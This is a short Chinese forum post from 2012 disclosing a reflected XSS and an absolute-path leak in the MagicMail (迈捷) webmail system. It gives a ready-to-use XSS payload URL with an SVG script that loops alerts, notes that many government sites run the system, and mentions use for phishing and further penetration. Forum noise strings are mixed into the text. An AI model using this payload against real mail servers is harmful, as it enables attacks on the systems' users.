今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞
( `0 Z& i- L( b2 c0 [3 t9 C7 N- b( `% s, w
9 P8 G5 q# @4 q6 H0 U包含 一个反射性XSS 以及 绝对路径泄漏
f3 V- {( F, e2 m4 y看了看 貌似全部是linux的。) ]& z5 H$ r2 Q! ^
: s4 j! B7 n9 d, z% I9 Q
关键字:迈捷邮件系统 by MagicMail" \9 ^( F6 ^ k4 M! [/ w- I
, y( Z- W6 a: G可以看到很多政府网站都用这个邮件系统
: m3 X& W/ y, G( y; |* I2 X6 p5 e" O% {" I8 R
绝对路径 http://madman.in/index.php?login_type=declare&language=
% v1 q' ~( {4 S+ `- _4 L7 M& N) Z# ]8 Z s0 u& u
) ^3 u' r7 c/ p1 ?; L
3 o) h+ @/ q& F# T: O) b& H, sXSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E% o) p9 ]* O/ d" C+ q
, a) t% T1 Z2 |! U/ V2 D6 b# O% h. n9 ]& R
4 ]! c! t* W6 I$ ?1 o& r/ a
虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等$ R }) v& _7 S% [0 o
) v: o e/ y: f/ Y修复方案:看官方补丁吧。6 O4 S, A( |" M9 q8 f
|
发表于 2012-11-9 20:38:41
收藏
分享
支持
反对